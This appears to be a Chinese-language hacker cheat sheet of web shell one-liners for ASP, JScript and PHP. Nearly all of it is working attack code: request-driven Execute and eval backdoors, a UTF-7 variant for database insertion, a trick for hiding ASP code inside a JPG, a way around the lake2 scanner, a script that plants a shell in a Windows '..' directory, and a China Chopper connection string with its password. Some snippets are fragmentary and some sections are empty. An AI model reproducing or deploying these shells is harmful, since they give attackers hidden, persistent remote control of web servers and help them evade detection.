ASP版:
ExecuteGlobal request(chr(35))
上面的是正常的SHELL,下面是变形的,
数据库里插入
┼攠數畣整爠煥敵瑳∨∣┩愾
utf-7的马
用include包含一个图片,图片最好是通过copy /b a.jpg+b.asp+c.jpg d.jpg生成出来的
要绕过lake2的话,用几个变量加常量的方法定义图片名再包含就可以了
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>
Script Encoder 加密
另类的,利用windows的目录漏洞,建立..目录里面放一句话,
Set fso=Server.CreateObject("Scripting.FileSystemObject")
path=server.mappath("/")
Set f = fso.CreateFolder(path&"index..")
Set a = fso.CreateTextFile(path&"index..1.asp", True)
a.WriteLine"
a.WriteLine"response.clear"
a.WriteLine"Execute request(chr(35))"
a.WriteLine"response.end"
a.WriteLine"end if"
a.WriteLine""
var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
lcx.性别((lcx.名字)+'');
%>
用冰狐就行了
PHP版:
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
菜刀连接:http://xx.com/shell.php?h=@eval($_POST[c]); 密码:c
ASP.NET版:
JSP版: